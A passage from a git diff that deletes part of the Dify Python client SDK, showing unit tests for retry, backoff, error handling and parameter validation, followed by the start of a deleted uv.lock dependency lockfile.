failed"), - httpx.NetworkError("Connection failed"), - Mock(status_code=200, content=b'{"success": true}'), - ] - mock_response = Mock() - mock_response.status_code = 200 - mock_response.content = b'{"success": true}' - - response = self.client._send_request("GET", "/test") - - self.assertEqual(response.status_code, 200) - self.assertEqual(mock_request.call_count, 3) - self.assertEqual(mock_sleep.call_count, 2) - - @patch("httpx.Client.request") - @patch("time.sleep") - def test_retry_on_timeout_error(self, mock_sleep, mock_request): - """Test retry on timeout errors.""" - mock_request.side_effect = [ - httpx.TimeoutException("Request timed out"), - httpx.TimeoutException("Request timed out"), - Mock(status_code=200, content=b'{"success": true}'), - ] - - response = self.client._send_request("GET", "/test") - - self.assertEqual(response.status_code, 200) - self.assertEqual(mock_request.call_count, 3) - self.assertEqual(mock_sleep.call_count, 2) - - @patch("httpx.Client.request") - @patch("time.sleep") - def test_max_retries_exceeded(self, mock_sleep, mock_request): - """Test behavior when max retries are exceeded.""" - mock_request.side_effect = httpx.NetworkError("Persistent network error") - - with self.assertRaises(NetworkError): - self.client._send_request("GET", "/test") - - self.assertEqual(mock_request.call_count, 4) # 1 initial + 3 retries - self.assertEqual(mock_sleep.call_count, 3) - - @patch("httpx.Client.request") - def test_no_retry_on_client_error(self, mock_request): - """Test that client errors (4xx) don't trigger retries.""" - mock_response = Mock() - mock_response.status_code = 401 - mock_response.json.return_value = {"message": "Unauthorized"} - mock_request.return_value = mock_response - - with self.assertRaises(AuthenticationError): - self.client._send_request("GET", "/test") - - self.assertEqual(mock_request.call_count, 1) - - @patch("httpx.Client.request") - def test_retry_on_server_error(self, mock_request): - """Test that server errors (5xx) don't retry - they raise APIError immediately.""" - mock_response_500 = Mock() - mock_response_500.status_code = 500 - mock_response_500.json.return_value = {"message": "Internal server error"} - - mock_request.return_value = mock_response_500 - - with self.assertRaises(APIError) as context: - self.client._send_request("GET", "/test") - - self.assertEqual(str(context.exception), "Internal server error") - self.assertEqual(context.exception.status_code, 500) - # Should not retry server errors - self.assertEqual(mock_request.call_count, 1) - - @patch("httpx.Client.request") - def test_exponential_backoff(self, mock_request): - """Test exponential backoff timing.""" - mock_request.side_effect = [ - httpx.NetworkError("Connection failed"), - httpx.NetworkError("Connection failed"), - httpx.NetworkError("Connection failed"), - httpx.NetworkError("Connection failed"), # All attempts fail - ] - - with patch("time.sleep") as mock_sleep: - with self.assertRaises(NetworkError): - self.client._send_request("GET", "/test") - - # Check exponential backoff: 0.1, 0.2, 0.4 - expected_calls = [0.1, 0.2, 0.4] - actual_calls = [call[0][0] for call in mock_sleep.call_args_list] - self.assertEqual(actual_calls, expected_calls) - - -class TestErrorHandling(unittest.TestCase): - """Test cases for error handling.""" - - def setUp(self): - self.client = DifyClient(api_key="test_api_key", enable_logging=False) - - @patch("httpx.Client.request") - def test_authentication_error(self, mock_request): - """Test AuthenticationError handling.""" - mock_response = Mock() - mock_response.status_code = 401 - mock_response.json.return_value = {"message": "Invalid API key"} - mock_request.return_value = mock_response - - with self.assertRaises(AuthenticationError) as context: - self.client._send_request("GET", "/test") - - self.assertEqual(str(context.exception), "Invalid API key") - self.assertEqual(context.exception.status_code, 401) - - @patch("httpx.Client.request") - def test_rate_limit_error(self, mock_request): - """Test RateLimitError handling.""" - mock_response = Mock() - mock_response.status_code = 429 - mock_response.json.return_value = {"message": "Rate limit exceeded"} - mock_response.headers = {"Retry-After": "60"} - mock_request.return_value = mock_response - - with self.assertRaises(RateLimitError) as context: - self.client._send_request("GET", "/test") - - self.assertEqual(str(context.exception), "Rate limit exceeded") - self.assertEqual(context.exception.retry_after, "60") - - @patch("httpx.Client.request") - def test_validation_error(self, mock_request): - """Test ValidationError handling.""" - mock_response = Mock() - mock_response.status_code = 422 - mock_response.json.return_value = {"message": "Invalid parameters"} - mock_request.return_value = mock_response - - with self.assertRaises(ValidationError) as context: - self.client._send_request("GET", "/test") - - self.assertEqual(str(context.exception), "Invalid parameters") - self.assertEqual(context.exception.status_code, 422) - - @patch("httpx.Client.request") - def test_api_error(self, mock_request): - """Test general APIError handling.""" - mock_response = Mock() - mock_response.status_code = 500 - mock_response.json.return_value = {"message": "Internal server error"} - mock_request.return_value = mock_response - - with self.assertRaises(APIError) as context: - self.client._send_request("GET", "/test") - - self.assertEqual(str(context.exception), "Internal server error") - self.assertEqual(context.exception.status_code, 500) - - @patch("httpx.Client.request") - def test_error_response_without_json(self, mock_request): - """Test error handling when response doesn't contain valid JSON.""" - mock_response = Mock() - mock_response.status_code = 500 - mock_response.content = b"Internal Server Error" - mock_response.json.side_effect = ValueError("No JSON object could be decoded") - mock_request.return_value = mock_response - - with self.assertRaises(APIError) as context: - self.client._send_request("GET", "/test") - - self.assertEqual(str(context.exception), "HTTP 500") - - @patch("httpx.Client.request") - def test_file_upload_error(self, mock_request): - """Test FileUploadError handling.""" - mock_response = Mock() - mock_response.status_code = 400 - mock_response.json.return_value = {"message": "File upload failed"} - mock_request.return_value = mock_response - - with self.assertRaises(FileUploadError) as context: - self.client._send_request_with_files("POST", "/upload", {}, {}) - - self.assertEqual(str(context.exception), "File upload failed") - self.assertEqual(context.exception.status_code, 400) - - -class TestParameterValidation(unittest.TestCase): - """Test cases for parameter validation.""" - - def setUp(self): - self.client = DifyClient(api_key="test_api_key", enable_logging=False) - - def test_empty_string_validation(self): - """Test validation of empty strings.""" - with self.assertRaises(ValidationError): - self.client._validate_params(empty_string="") - - def test_whitespace_only_string_validation(self): - """Test validation of whitespace-only strings.""" - with self.assertRaises(ValidationError): - self.client._validate_params(whitespace_string=" ") - - def test_long_string_validation(self): - """Test validation of overly long strings.""" - long_string = "a" * 10001 # Exceeds 10000 character limit - with self.assertRaises(ValidationError): - self.client._validate_params(long_string=long_string) - - def test_large_list_validation(self): - """Test validation of overly large lists.""" - large_list = list(range(1001)) # Exceeds 1000 item limit - with self.assertRaises(ValidationError): - self.client._validate_params(large_list=large_list) - - def test_large_dict_validation(self): - """Test validation of overly large dictionaries.""" - large_dict = {f"key_{i}": i for i in range(101)} # Exceeds 100 item limit - with self.assertRaises(ValidationError): - self.client._validate_params(large_dict=large_dict) - - def test_valid_parameters_pass(self): - """Test that valid parameters pass validation.""" - # Should not raise any exception - self.client._validate_params( - valid_string="Hello, World!", - valid_list=[1, 2, 3], - valid_dict={"key": "value"}, - none_value=None, - ) - - def test_message_feedback_validation(self): - """Test validation in message_feedback method.""" - with self.assertRaises(ValidationError): - self.client.message_feedback("msg_id", "invalid_rating", "user") - - def test_completion_message_validation(self): - """Test validation in create_completion_message method.""" - from dify_client.client import CompletionClient - - client = CompletionClient("test_api_key") - - with self.assertRaises(ValidationError): - client.create_completion_message( - inputs="not_a_dict", # Should be a dict - response_mode="invalid_mode", # Should be 'blocking' or 'streaming' - user="test_user", - ) - - def test_chat_message_validation(self): - """Test validation in create_chat_message method.""" - from dify_client.client import ChatClient - - client = ChatClient("test_api_key") - - with self.assertRaises(ValidationError): - client.create_chat_message( - inputs="not_a_dict", # Should be a dict - query="", # Should not be empty - user="test_user", - response_mode="invalid_mode", # Should be 'blocking' or 'streaming' - ) - - -if __name__ == "__main__": - unittest.main() diff --git a/sdks/python-client/uv.lock b/sdks/python-client/uv.lock deleted file mode 100644 index 4a9d7d5193..0000000000 --- a/sdks/python-client/uv.lock +++ /dev/null @@ -1,307 +0,0 @@ -version = 1 -revision = 3 -requires-python = ">=3.10" - -[[package]] -name = "aiofiles" -version = "25.1.0" -source = { registry = "https://pypi.org/simple" } -sdist = { url = "https://files.pythonhosted.org/packages/41/c3/534eac40372d8ee36ef40df62ec129bee4fdb5ad9706e58a29be53b2c970/aiofiles-25.1.0.tar.gz", hash = "sha256:a8d728f0a29de45dc521f18f07297428d56992a742f0cd2701ba86e44d23d5b2", size = 46354, upload-time = "2025-10-09T20:51:04.358Z" } -wheels = [ - { url = "https://files.pythonhosted.org/packages/bc/8a/340a1555ae33d7354dbca4faa54948d76d89a27ceef032c8c3bc661d003e/aiofiles-25.1.0-py3-none-any.whl", hash = "sha256:abe311e527c862958650f9438e859c1fa7568a141b22abcd015e120e86a85695", size = 14668, upload-time = "2025-10-09T20:51:03.174Z" }, -] - -[[package]] -name = "anyio" -version = "4.11.0" -source = { registry = "https://pypi.org/simple" } -dependencies = [ - { name = "exceptiongroup", marker = "python_full_version < '3.11'" }, - { name = "idna" }, - { name = "sniffio" }, - { name = "typing-extensions", marker = "python_full_version < '3.13'" }, -] -sdist = { url = "https://files.pythonhosted.org/packages/c6/78/7d432127c41b50bccba979505f272c16cbcadcc33645d5fa3a738110ae75/anyio-4.11.0.tar.gz", hash = "sha256:82a8d0b81e318cc5ce71a5f1f8b5c4e63619620b63141ef8c995fa0db95a57c4", size = 219094, upload-time = "2025-09-23T09:19:12.58Z" } -wheels = [ - { url = "https://files.pythonhosted.org/packages/15/b3/9b1a8074496371342ec1e796a96f99c82c945a339cd81a8e73de28b4cf9e/anyio-4.11.0-py3-none-any.whl", hash = "sha256:0287e96f4d26d4149305414d4e3bc32f0dcd0862365a4bddea19d7a1ec38c4fc", size = 109097, upload-time = "2025-09-23T09:19:10.601Z" }, -] - -[[package]] -name = "backports-asyncio-runner" -version = "1.2.0" -source = { registry = "https://pypi.org/simple" } -sdist = { url = "https://files.pythonhosted.org/packages/8e/ff/70dca7d7cb1cbc0edb2c6cc0c38b65cba36cccc491eca64cabd5fe7f8670/backports_asyncio_runner-1.2.0.tar.gz", hash = "sha256:a5aa7b2b7d8f8bfcaa2b57313f70792df84e32a2a746f585213373f900b42162", size = 69893, upload-time = "2025-07-02T02:27:15.685Z" } -wheels = [ - { url = "https://files.pythonhosted.org/packages/a0/59/76ab57e3fe74484f48a53f8e337171b4a2349e506eabe136d7e01d059086/backports_asyncio_runner-1.2.0-py3-none-any.whl", hash = "sha256:0da0a936a8aeb554eccb426dc55af3ba63bcdc69fa1a600b5bb305413a4477b5", size = 12313, upload-time = "2025-07-02T02:27:14.263Z" }, -] - -[[package]] -name = "certifi" -version = "2025.10.5" -source = { registry = "https://pypi.org/simple" } -sdist = { url = "https://files.pythonhosted.org/packages/4c/5b/b6ce21586237c77ce67d01dc5507039d444b630dd76611bbca2d8e5dcd91/certifi-2025.10.5.tar.gz", hash = "sha256:47c09d31ccf2acf0be3f701ea53595ee7e0b8fa08801c6624be771df09ae7b43", size = 164519, upload-time = "2025-10-05T04:12:15.808Z" } -wheels = [ - { url = "https://files.pythonhosted.org/packages/e4/37/af0d2ef3967ac0d6113837b44a4f0bfe1328c2b9763bd5b1744520e5cfed/certifi-2025.10.5-py3-none-any.whl", hash = "sha256:0f212c2744a9bb6de0c56639a6f68afe01ecd92d91f14ae897c4fe7bbeeef0de", size = 163286, upload-time = "2025-10-05T04:12:14.03Z" }, -] - -[[package]] -name = "colorama" -version = "0.4.6" -source = { registry = "https://pypi.org/simple" } -sdist = { url = "https://files.pythonhosted.org/packages/d8/53/6f443c9a4a8358a93a6792e2acffb9d9d5cb0a5cfd8802644b7b1c9a02e4/colorama-0.4.6.tar.gz", hash = "sha256:08695f5cb7ed6e0531a20572697297273c47b8cae5a63ffc6d6ed5c201be6e44", size = 27697, upload-time = "2022-10-25T02:36:22.414Z" } -wheels = [ - { url = "https://files.pythonhosted.org/packages/d1/d6/3965ed04c63042e047cb6a3e6ed1a63a35087b6a609aa3a15ed8ac56c221/colorama-0.4.6-py2.py3-none-any.whl", hash = "sha256:4f1d9991f5acc0ca119f9d443620b77f9d6b33703e51011c16baf57afb285fc6", size = 25335, upload-time = "2022-10-25T02:36:20.889Z" }, -] - -[[package]] -name = "dify-client" -version = "0.1.12" -source = { editable = "." } -dependencies = [ - { name = "aiofiles" }, - { name = "httpx", extra = ["http2"] }, -] - -[package.optional-dependencies] -dev = [ - { name = "pytest" }, - { name = "pytest-asyncio" }, -] - -[package.metadata] -requires-dist = [ - { name = "aiofiles", specifier = ">=23.0.0" }, - { name = "httpx", extras = ["http2"], specifier = ">=0.27.0" }, - { name = "pytest", marker = "extra == 'dev'", specifier = ">=7.0.0" }, - { name = "pytest-asyncio", marker = "extra == 'dev'", specifier = ">=0.21.0" }, -] -provides-extras = ["dev"] - -[[package]] -name = "exceptiongroup" -version = "1.3.0" -source = { registry = "https://pypi.org/simple" } -dependencies = [ - { name = "typing-extensions", marker = "python_full_version < '3.13'" }, -] -sdist = { url = "https://files.pythonhosted.org/packages/0b/9f/a65090624ecf468cdca03533906e7c69ed7588582240cfe7cc9e770b50eb/exceptiongroup-1.3.0.tar.gz", hash = "sha256:b241f5885f560bc56a59ee63ca4c6a8bfa46ae4ad651af316d4e81817bb9fd88", size = 29749, upload-time = "2025-05-10T17:42:51.123Z" } -wheels = [ - { url = "https://files.pythonhosted.org/packages/36/f4/c6e662dade71f56cd2f3735141b265c3c79293c109549c1e6933b0651ffc/exceptiongroup-1.3.0-py3-none-any.whl", hash = "sha256:4d111e6e0c13d0644cad6ddaa7ed0261a0b36971f6d23e7ec9b4b9097da78a10", size = 16674, upload-time = "2025-05-10T17:42:49.33Z" }, -] - -[[package]] -name = "h11" -version = "0.16.0" -source = { registry = "https://pypi.org/simple" } -sdist = { url = "https://files.pythonhosted.org/packages/01/ee/02a2c011bdab74c6fb3c75474d40b3052059d95df7e73351460c8588d963/h11-0.16.0.tar.gz", hash = "sha256:4e35b956cf45792e4caa5885e69fba00bdbc6ffafbfa020300e549b208ee5ff1", size = 101250, upload-time = "2025-04-24T03:35:25.427Z" } -wheels = [ - { url = "https://files.pythonhosted.org/packages/04/4b/29cac41a4d98d144bf5f6d33995617b185d14b22401f75ca86f384e87ff1/h11-0.16.0-py3-none-any.whl", hash = "sha256:63cf8bbe7522de3bf65932fda1d9c2772064ffb3dae62d55932da54b31cb6c86", size = 37515, upload-time = "2025-04-24T03:35:24.344Z" }, -] - -[[package]] -name = "h2" -version = "4.3.0" -source = { registry = "https://pypi.org/simple" } -dependencies = [ - { name = "hpack" }, - { name = "hyperframe" }, -] -sdist = { url = "https://files.pythonhosted.org/packages/1d/17/afa56379f94ad0fe8defd37d6eb3f89a25404ffc71d4d848893d270325fc/h2-4.3.0.tar.gz", hash = "sha256:6c59efe4323fa18b47a632221a1888bd7fde6249819beda254aeca909f221bf1", size = 2152026, upload-time = "2025-08-23T18:12:19.778Z" } -wheels = [ - { url = "https://files.pythonhosted.org/packages/69/b2/119f6e6dcbd96f9069ce9a2665e0146588dc9f88f29549711853645e736a/h2-4.3.0-py3-none-any.whl", hash = "sha256:c438f029a25f7945c69e0ccf0fb951dc3f73a5f6412981daee861431b70e2bdd", size = 61779, upload-time = "2025-08-23T18:12:17.779Z" }, -] - -[[package]] -name = "hpack" -version = "4.1.0" -source = { registry = "https://pypi.org/simple" } -sdist = { url = "https://files.pythonhosted.org/packages/2c/48/71de9ed269fdae9c8057e5a4c0aa7402e8bb16f2c6e90b3aa53327b113f8/hpack-4.1.0.tar.gz", hash = "sha256:ec5eca154f7056aa06f196a557655c5b009b382873ac8d1e66e79e87535f1dca", size = 51276, upload-time = "2025-01-22T21:44:58.347Z" } -wheels = [ - { url = "https://files.pythonhosted.org/packages/07/c6/80c95b1b2b94682a72cbdbfb85b81ae2daffa4291fbfa1b1464502ede10d/hpack-4.1.0-py3-none-any.whl", hash = "sha256:157ac792668d995c657d93111f46b4535ed114f0c9c8d672271bbec7eae1b496", size = 34357, upload-time = "2025-01-22T21:44:56.92Z" }, -] - -[[package]] -name = "httpcore" -version = "1.0.9" -source = { registry = "https://pypi.org/simple" } -dependencies = [ - { name = "certifi" }, - { name = "h11" }, -] -sdist = { url = "https://files.pythonhosted.org/packages/06/94/82699a10bca87a5556c9c59b5963f2d039dbd239f25bc2a63907a05a14cb/httpcore-1.0.9.tar.gz", hash = "sha256:6e34463af53fd2ab5d807f399a9b45ea31c3dfa2276f15a2c3f00afff6e176e8", size = 85484, upload-time = "2025-04-24T22:06:22.219Z" } -wheels = [ - { url = "https://files.pythonhosted.org/packages/7e/f5/f66802a942d491edb555dd61e3a9961140fd64c90bce1eafd741609d334d/httpcore-1.0.9-py3-none-any.whl", hash = "sha256:2d400746a40668fc9dec9810239072b40b4484b640a8c38fd654a024c7a1bf55", size = 78784, upload-time = "2025-04-24T22:06:20.566Z" }, -] - -[[package]] -name = "httpx" -version = "0.28.1" -source = { registry = "https://pypi.org/simple" } -dependencies = [ - { name = "anyio" }, - { name = "certifi" }, - { name = "httpcore" }, - { name = "idna" }, -] -sdist = { url = "https://files.pythonhosted.org/packages/b1/df/48c586a5fe32a0f01324ee087459e112ebb7224f646c0b5023f5e79e9956/httpx-0.28.1.tar.gz", hash = "sha256:75e98c5f16b0f35b567856f597f06ff2270a374470a5c2392242528e3e3e42fc", size = 141406, upload-time = "2024-12-06T15:37:23.222Z" } -wheels = [ - { url = "https://files.pythonhosted.org/packages/2a/39/e50c7c3a983047577ee07d2a9e53faf5a69493943ec3f6a384bdc792deb2/httpx-0.28.1-py3-none-any.whl", hash = "sha256:d909fcccc110f8c7faf814ca82a9a4d816bc5a6dbfea25d6591d6985b8ba59ad", size = 73517, upload-time = "2024-12-06T15:37:21.509Z" }, -] - -[package.optional-dependencies] -http2 = [ - { name = "h2" }, -] - -[[package]] -name = "hyperframe" -version = "6.1.0" -source = { registry = "https://pypi.org/simple" } -sdist = { url = "https://files.pythonhosted.org/packages/02/e7/94f8232d4a74cc99514c13a9f995811485a6903d48e5d952771ef6322e30/hyperframe-6.1.0.tar.gz", hash = "sha256:f630908a00854a7adeabd6382b43923a4c4cd4b821fcb527e6ab9e15382a3b08", size = 26566, upload-time = "2025-01-22T21:41:49.302Z" } -wheels = [ - { url = "https://files.pythonhosted.org/packages/48/30/47d0bf6072f7252e6521f3447ccfa40b421b6824517f82854703d0f5a98b/hyperframe-6.1.0-py3-none-any.whl", hash = "sha256:b03380493a519fce58ea5af42e4a42317bf9bd425596f7a0835ffce80f1a42e5", size = 13007, upload-time = "2025-01-22T21:41:47.295Z" }, -] - -[[package]] -name = "idna" -version = "3.10" -source = { registry = "https://pypi.org/simple" } -sdist = { url = "https://files.pythonhosted.org/packages/f1/70/7703c29685631f5a7590aa73f1f1d3fa9a380e654b86af429e0934a32f7d/idna-3.10.tar.gz", hash = "sha256:12f65c9b470abda6dc35cf8e63cc574b1c52b11df2c86030af0ac09b01b13ea9", size = 190490, upload-time = "2024-09-15T18:07:39.745Z" } -wheels = [ - { url = "https://files.pythonhosted.org/packages/76/c6/c88e154df9c4e1a2a66ccf0005a88dfb2650c1dffb6f5ce603dfbd452ce3/idna-3.10-py3-none-any.whl", hash = "sha256:946d195a0d259cbba61165e88e65941f16e9b36ea6ddb97f00452bae8b1287d3", size = 70442, upload-time = "2024-09-15T18:07:37.964Z" }, -] - -[[package]] -name = "iniconfig" -version = "2.1.0" -source = { registry = "https://pypi.org/simple" } -sdist = { url = "https://files.pythonhosted.org/packages/f2/97/ebf4da567aa6827c909642694d71c9fcf53e5b504f2d96afea02718862f3/iniconfig-2.1.0.tar.gz", hash = "sha256:3abbd2e30b36733fee78f9c7f7308f2d0050e88f0087fd25c2645f63c773e1c7", size = 4793, upload-time = "2025-03-19T20:09:59.721Z" } -wheels = [ - { url = "https://files.pythonhosted.org/packages/2c/e1/e6716421ea10d38022b952c159d5161ca1193197fb744506875fbb87ea7b/iniconfig-2.1.0-py3-none-any.whl", hash = "sha256:9deba5723312380e77435581c6bf4935c94cbfab9b1ed33ef8d238ea168eb760", size = 6050, upload-time = "2025-03-19T20:10:01.071Z" }, -] - -[[package]] -name = "packaging" -version = "25.0" -source = { registry = "https://pypi.org/simple" } -sdist = { url = "https://files.pythonhosted.org/packages/a1/d4/1fc4078c65507b51b96ca8f8c3ba19e6a61c8253c72794544580a7b6c24d/packaging-25.0.tar.gz", hash = "sha256:d443872c98d677bf60f6a1f2f8c1cb748e8fe762d2bf9d3148b5599295b0fc4f", size = 165727, upload-time = "2025-04-19T11:48:59.673Z" } -wheels = [ - { url = "https://files.pythonhosted.org/packages/20/12/38679034af332785aac8774540895e234f4d07f7545804097de4b666afd8/packaging-25.0-py3-none-any.whl", hash = "sha256:29572ef2b1f17581046b3a2227d5c611fb25ec70ca1ba8554b24b0e69331a484", size = 66469, upload-time = "2025-04-19T11:48:57.875Z" }, -] - -[[package]] -name = "pluggy" -version = "1.6.0" -source = { registry = "https://pypi.org/simple" } -sdist = { url = "https://files.pythonhosted.org/packages/f9/e2/3e91f31a7d2b083fe6ef3fa267035b518369d9511ffab804f839851d2779/pluggy-1.6.0.tar.gz", hash = "sha256:7dcc130b76258d33b90f61b658791dede3486c3e6bfb003ee5c9bfb396dd22f3", size = 69412, upload-time = "2025-05-15T12:30:07.975Z" } -wheels = [ - { url = "https://files.pythonhosted.org/packages/54/20/4d324d65cc6d9205fabedc306948156824eb9f0ee1633355a8f7ec5c66bf/pluggy-1.6.0-py3-none-any.whl", hash = "sha256:e920276dd6813095e9377c0bc5566d94c932c33b27a3e3945d8389c374dd4746", size = 20538, upload-time = "2025-05-15T12:30:06.134Z" }, -] - -[[package]] -name = "pygments" -version = "2.19.2" -source = { registry = "https://pypi.org/simple" } -sdist = { url = "https://files.pythonhosted.org/packages/b0/77/a5b8c569bf593b0140bde72ea885a803b82086995367bf2037de0159d924/pygments-2.19.2.tar.gz", hash = "sha256:636cb2477cec7f8952536970bc533bc43743542f70392ae026374600add5b887", size = 4968631, upload-time = "2025-06-21T13:39:12.283Z" } -wheels = [ - { url = "https://files.pythonhosted.org/packages/c7/21/705964c7812476f378728bdf590ca4b771ec72385c533964653c68e86bdc/pygments-2.19.2-py3-none-any.whl", hash = "sha256:86540386c03d588bb81d44bc3928634ff26449851e99741617ecb9037ee5ec0b", size = 1225217, upload-time = "2025-06-21T13:39:07.939Z" }, -] - -[[package]] -name = "pytest" -version = "8.4.2" -source = { registry = "https://pypi.org/simple" } -dependencies = [ - { name = "colorama", marker = "sys_platform == 'win32'" }, - { name = "exceptiongroup", marker = "python_full_version < '3.11'" }, - { name = "iniconfig" }, - { name = "packaging" }, - { name = "pluggy" }, - { name = "pygments" }, - { name = "tomli", marker = "python_full_version < '3.11'" }, -] -sdist = { url = "https://files.pythonhosted.org/packages/a3/5c/00a0e072241553e1a7496d638deababa67c5058571567b92a7eaa258397c/pytest-8.4.2.tar.gz", hash = "sha256:86c0d0b93306b961d58d62a4db4879f27fe25513d4b969df351abdddb3c30e01", size = 1519618, upload-time = "2025-09-04T14:34:22.711Z" } -wheels = [ - { url = "https://files.pythonhosted.org/packages/a8/a4/20da314d277121d6534b3a980b29035dcd51e6744bd79075a6ce8fa4eb8d/pytest-8.4.2-py3-none-any.whl", hash = "sha256:872f880de3fc3a5bdc88a11b39c9710c3497a547cfa9320bc3c5e62fbf272e79", size = 365750, upload-time = "2025-09-04T14:34:20.226Z" }, -] - -[[package]] -name = "pytest-asyncio" -version = "1.2.0" -source = { registry = "https://pypi.org/simple" } -dependencies = [ - { name = "backports-asyncio-runner", marker = "python_full_version < '3.11'" }, - { name = "pytest" }, - { name = "typing-extensions", marker = "python_full_version < '3.13'" }, -] -sdist = { url = "https://files.pythonhosted.org/packages/42/86/9e3c5f48f7b7b638b216e4b9e645f54d199d7abbbab7a64a13b4e12ba10f/pytest_asyncio-1.2.0.tar.gz", hash = "sha256:c609a64a2a8768462d0c99811ddb8bd2583c33fd33cf7f21af1c142e824ffb57", size = 50119, upload-time = "2025-09-12T07:33:53.816Z" } -wheels = [ - { url = "https://files.pythonhosted.org/packages/04/93/2fa34714b7a4ae72f2f8dad66ba17dd9a2c793220719e736dda28b7aec27/pytest_asyncio-1.2.0-py3-none-any.whl", hash = "sha256:8e17ae5e46d8e7efe51ab6494dd2010f4ca8dae51652aa3c8d55acf50bfb2e99", size = 15095, upload-time = "2025-09-12T07:33:52.639Z" }, -] - -[[package]] -name = "sniffio" -version = "1.3.1" -source = { registry = "https://pypi.org/simple" } -sdist = { url = "https://files.pythonhosted.org/packages/a2/87/a6771e1546d97e7e041b6ae58d80074f81b7d5121207425c964ddf5cfdbd/sniffio-1.3.1.tar.gz", hash = "sha256:f4324edc670a0f49750a81b895f35c3adb843cca46f0530f79fc1babb23789dc", size = 20372, upload-time = "2024-02-25T23:20:04.057Z" } -wheels = [ - { url = "https://files.pythonhosted.org/packages/e9/44/75a9c9421471a6c4805dbf2356f7c181a29c1879239abab1ea2cc8f38b40/sniffio-1.3.1-py3-none-any.whl", hash = "sha256:2f6da418d1f1e0fddd844478f41680e794e6051915791a034ff65e5f100525a2", size = 10235, upload-time = "2024-02-25T23:20:01.196Z" }, -] - -[[package]] -name = "tomli" -version = "2.3.0" -source = { registry = "https://pypi.org/simple" } -sdist = { url = "https://files.pythonhosted.org/packages/52/ed/3f73f72945444548f33eba9a87fc7a6e969915e7b1acc8260b30e1f76a2f/tomli-2.3.0.tar.gz", hash = "sha256:64be704a875d2a59753d80ee8a533c3fe183e3f06807ff7dc2232938ccb01549", size = 17392, upload-time = "2025-10-08T22:01:47.119Z" } -wheels = [ - { url = "https://files.pythonhosted.org/packages/b3/2e/299f62b401438d5fe1624119c723f5d877acc86a4c2492da405626665f12/tomli-2.3.0-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:88bd15eb972f3664f5ed4b57c1634a97153b4bac4479dcb6a495f41921eb7f45", size = 153236, upload-time = "2025-10-08T22:01:00.137Z" }, - { url = "https://files.pythonhosted.org/packages/86/7f/d8fffe6a7aefdb61bced88fcb5e280cfd71e08939da5894161bd71bea022/tomli-2.3.0-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:883b1c0d6398a6a9d29b508c331fa56adbcdff647f6ace4dfca0f50e90dfd0ba", size = 148084, upload-time = "2025-10-08T22:01:01.63Z" }, - { url = "https://files.pythonhosted.org/packages/47/5c/24935fb6a2ee63e86d80e4d3b58b222dafaf438c416752c8b58537c8b89a/tomli-2.3.0-cp311-cp311-manylinux2014_aarch64.manylinux_2_17_aarch64.manylinux_2_28_aarch64.whl", hash = "sha256:d1381caf13ab9f300e30dd8feadb3de072aeb86f1d34a8569453ff32a7dea4bf", size = 234832, upload-time = "2025-10-08T22:01:02.543Z" }, - { url = "https://files.pythonhosted.org/packages/89/da/75dfd804fc11e6612846758a23f13271b76d577e299592b4371a4ca4cd09/tomli-2.3.0-cp311-cp311-manylinux2014_x86_64.manylinux_2_17_x86_64.manylinux_2_28_x86_64.whl", hash = "sha256:a0e285d2649b78c0d9027570d4da3425bdb49830a6156121360b3f8511ea3441", size = 242052, upload-time = "2025-10-08T22:01:03.836Z" }, - { url = "https://files.pythonhosted.org/packages/70/8c/f48ac899f7b3ca7eb13af73bacbc93aec37f9c954df3c08ad96991c8c373/tomli-2.3.0-cp311-cp311-musllinux_1_2_aarch64.whl", hash = "sha256:0a154a9ae14bfcf5d8917a59b51ffd5a3ac1fd149b71b47a3a104ca4edcfa845", size = 239555, upload-time = "2025-10-08T22:01:04.834Z" }, - { url = "https://files.pythonhosted.org/packages/ba/28/72f8afd73f1d0e7829bfc093f4cb98ce0a40ffc0cc997009ee1ed94ba705/tomli-2.3.0-cp311-cp311-musllinux_1_2_x86_64.whl", hash = "sha256:74bf8464ff93e413514fefd2be591c3b0b23231a77f901db1eb30d6f712fc42c", size = 245128, upload-time = "2025-10-08T22:01:05.84Z" }, - { url = "https://files.pythonhosted.org/packages/b6/eb/a7679c8ac85208706d27436e8d421dfa39d4c914dcf5fa8083a9305f58d9/tomli-2.3.0-cp311-cp311-win32.whl", hash = "sha256:00b5f5d95bbfc7d12f91ad8c593a1659b6387b43f054104cda404be6bda62456", size = 96445, upload-time = "2025-10-08T22:01:06.896Z" }, - { url = "https://files.pythonhosted.org/packages/0a/fe/3d3420c4cb1ad9cb462fb52967080575f15898da97e21cb6f1361d505383/tomli-2.3.0-cp311-cp311-win_amd64.whl", hash = "sha256:4dc4ce8483a5d429ab602f111a93a6ab1ed425eae3122032db7e9acf449451be", size = 107165, upload-time = "2025-10-08T22:01:08.107Z" }, - { url = "https://files.pythonhosted.org/packages/ff/b7/40f36368fcabc518bb11c8f06379a0fd631985046c038aca08c6d6a43c6e/tomli-2.3.0-cp312-cp312-macosx_10_13_x86_64.whl", hash = "sha256:d7d86942e56ded512a594786a5ba0a5e521d02529b3826e7761a05138341a2ac", size = 154891, upload-time = "2025-10-08T22:01:09.082Z" }, - { url = "https://files.pythonhosted.org/packages/f9/3f/d9dd692199e3b3aab2e4e4dd948abd0f790d9ded8cd10cbaae276a898434/tomli-2.3.0-cp312-cp312-macosx_11_0_arm64.whl", hash = "sha256:73ee0b47d4dad1c5e996e3cd33b8a76a50167ae5f96a2607cbe8cc773506ab22", size = 148796, upload-time = "2025-10-08T22:01:10.266Z" }, - { url = "https://files.pythonhosted.org/packages/60/83/59bff4996c2cf9f9387a0f5a3394629c7efa5ef16142076a23a90f1955fa/tomli-2.3.0-cp312-cp312-manylinux2014_aarch64.manylinux_2_17_aarch64.manylinux_2_28_aarch64.whl", hash = "sha256:792262b94d5d0a466afb5bc63c7daa9d75520110971ee269152083270998316f", size = 242121, upload-time = "2025-10-08T22:01:11.332Z" }, - { url = "https://files.pythonhosted.org/packages/45/e5/7c5119ff39de8693d6baab6c0b6dcb556d192c165596e9fc231ea1052041/tomli-2.3.0-cp312-cp312-manylinux2014_x86_64.manylinux_2_17_x86_64.manylinux_2_28_x86_64.whl", hash = "sha256:4f195fe57ecceac95a66a75ac24d9d5fbc98ef0962e09b2eddec5d39375aae52", size = 250070, upload-time = "2025-10-08T22:01:12.498Z" }, - { url = "https://files.pythonhosted.org/packages/45/12/ad5126d3a278f27e6701abde51d342aa78d06e27ce2bb596a01f7709a5a2/tomli-2.3.0-cp312-cp312-musllinux_1_2_aarch64.whl", hash = 